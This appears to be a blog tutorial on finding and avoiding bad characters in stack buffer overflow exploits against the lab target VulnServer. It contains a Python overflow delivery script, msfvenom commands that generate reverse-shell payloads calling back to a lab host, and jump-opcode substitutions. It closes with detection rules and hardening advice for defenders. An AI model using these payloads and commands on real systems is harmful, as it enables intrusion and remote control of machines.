Bad Characters, Null Bytes, and Restricted Character Sets

By Debraj Basak·Jun 20, 2026·11 min readExploit Development

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.

Contents

1 1. What Are Bad Characters? The Concept Explained
2 2. Why \x00 Is Always the First Enemy
3 3. Common Bad Characters by Protocol and Context
4 4. Building and Sending the Test Byte Array
5 5. Inspecting Memory: Immunity Debugger and mona.py
6 6. Iterative Elimination: Narrowing the Bad List
7 7. Encoding Shellcode with msfvenom
8 8. Alphanumeric and Printable-Only Constraints
9 9. Instruction Substitution: Jumping Without Bad Opcodes
10 10. Unicode / Wide-Character Transformations
11 11. Common Attacker Techniques
12 12. Defensive Strategies & Detection
13 13. Tools for Bad-Character Analysis
14 14. MITRE ATT&CK Mapping
15 Summary
16 Related Tutorials
17 References
- 17.1 Keep going in Exploit Development
- 17.2 Get new drops in your inbox

1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupt, truncate, or transform the payload before it reaches EIP. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target interprets incorrectly — a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, sprintf, and the deprecated gets operate on null-terminated buffers and stop on specific sentinel bytes.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

Missing bytes — characters stripped entirely by a sanitiser.
Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

Flow diagram showing how a raw payload passes through a string API and produces three failure modes: missing bytes, altered bytes, and premature truncation before reaching the destination buffer — Three distinct ways a bad character corrupts a payload before it ever reaches the destination memory region.

2. Why `\x00` Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

Function	Behavior on `\x00`
`strcpy`	Stops copying at the first null
`strncpy`	Stops at null or `n` bytes
`strlen`	Returns length up to first null
`sprintf`	Terminates the formatted string
`gets`	Legacy, present in old targets

At the assembly level, strlen walks the buffer comparing each byte to zero and breaks on a match — that loop defines the truncation boundary. This is not a convention; it is a property of how the Windows CRT and Win32 LPSTR / LPWSTR parameters handle null-terminated strings.

Network contexts differ. A socket recv call reads a fixed byte count and will pass null bytes through the wire into the buffer. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.

3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

Byte	Hex	Reason
Null	`\x00`	String terminator — always bad in string overflows
Line Feed	`\x0A`	Newline — terminates input in many protocol parsers
Carriage Return	`\x0D`	CR — terminates input lines (HTTP, SMTP, POP3)
Space	`\x20`	Whitespace delimiter — terminates tokens in some parsers
Form Feed	`\xFF`	Causes issues in some parsing contexts

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.

4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.send(b"TRUN /.:/" + buf)          # VulnServer TRUN command
s.close()

After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.

5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\bytearray.bin -a <ESP_address>

!mona config sets the output directory.
!mona bytearray -cpb "\x00" writes a reference bytearray.bin (all \x01–\xFF) excluding the specified bad chars.
!mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Annotated mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 18 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.

Cyclic flow diagram of the iterative bad-character elimination process: generate byte array, send, crash and inspect, diff with mona, confirm bad byte, add to exclusion list, and repeat until the array is intact — Only the first byte of a corrupted run is confirmed bad — iterate the send-diff-eliminate loop until the full array survives intact in memory.

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom‘s -b flag specifies the forbidden bytes; it then picks an encoder — x86/shikata_ga_nai by default — to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload — a 71-byte stub can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

Hierarchy diagram showing how a known bad-character set feeds into msfvenom which selects between shikata_ga_nai as default, call4_dword_xor as fallback, and alpha_mixed for printable-only constraints, all producing encoded shellcode — msfvenom encoder selection is driven by the bad-char list — escalate through fallback encoders when the default cannot find a valid opcode permutation.

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to printable-ASCII-only output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode confined to the \x21–\x7E printable range — ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the payload, removing the self-locating GetPC stub. The trade-off is size — an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.

9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP maps to \xEB, and \xEB is frequently bad in HTTP and other network-protocol targets — so the instruction cannot be used as-is.

Instruction	Opcode bytes	Notes
`JMP SHORT +6`	`\xEB \x06`	`\xEB` often restricted
`JE / JNE` pair	`\x74 .. \x75 ..`	Two complementary branches always taken together
Near `JMP`	`\xE9 .. .. .. ..`	Alternative when `\xEB` is bad

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx  -> jump if ZF=1
    jne short target     ; 75 xx  -> jump if ZF=0
    ; one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT to the handler stub — its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.

10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a wide character and effectively inserting a null after every byte. This breaks shellcode alignment entirely — it is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- every odd byte zeroed
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical mitigation is Venetian shellcode — manually constructed so that the injected null bytes become harmless padding instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.

11. Common Attacker Techniques

Technique	Description
Bad-char enumeration	Inject `\x01`–`\xFF`, diff memory, identify forbidden bytes
Shellcode encoding	Re-encode with `shikata_ga_nai` / `call4_dword_xor` to avoid bad bytes
Alphanumeric shellcode	`alpha_mixed` / Alpha2 for printable-only constraints
Jump substitution	Replace `\xEB` with `JE/JNE` pairs or near `JMP`
Venetian shellcode	Survive Unicode expansion in wide-character buffers
Egghunter staging	Small finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.

12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event ID	Name	Relevance
`1`	Process Creation	Frameworks (Metasploit, Empire) launching payloads
`3`	Network Connection	Outbound C2 from an exploited process
`8`	CreateRemoteThread	Post-exploitation thread injection
`10`	ProcessAccess	Cross-process open by injected payload
`11`	FileCreate	Shellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high

Additional telemetry and hardening:

ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
Compiler mitigations — /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
Memory integrity — flag executable pages not backed by a known on-disk image.
Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Hierarchy diagram mapping an exploit attempt to four detection and mitigation layers: network WAF, OS mitigations like DEP and CFG, Sysmon Event ID 10 with unknown CallTrace, ETWTI injection telemetry, and Security Event 4688 process creation logging — Defence-in-depth layers each intercept exploitation at a different stage — encoded shellcode evades transport filters but generates unmistakable runtime telemetry.

13. Tools for Bad-Character Analysis

Tool	Description	Link
Immunity Debugger	Crash analysis, ESP dump inspection	immunityinc.com
mona.py	Bytearray generation and memory comparison	github.com/corelan
WinDbg	Opcode/gadget inspection, memory diffing	microsoft.com
msfvenom	Shellcode generation and encoding (`-b`)	offsec.com
Alpha2	Standalone alphanumeric shellcode encoder	github.com
x64dbg	User-mode debugging and patching	x64dbg.com
Ghidra	Static opcode/disassembly analysis	ghidra-sre.org
Volatility	Memory forensics, unbacked code regions	volatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Process crash bursts, EID `1` framework launches
Exploit Public-Facing Application	`T1190`	WAF anomalies, service access violations
Exploitation for Privilege Escalation	`T1068`	Local overflow → elevated process behavior
Obfuscated Files or Information	`T1027`	Encoder signatures (shikata/alpha) on disk/wire
Process Injection	`T1055`	Sysmon EID `8`/`10`, `UNKNOWN` in `CallTrace`

Summary

Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it reaches EIP — you must enumerate them empirically, never assume.
\x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

References

Post Views: 15

Get new drops in your inbox

Windows internals, exploit dev, and red-team write-ups — no spam, unsubscribe anytime.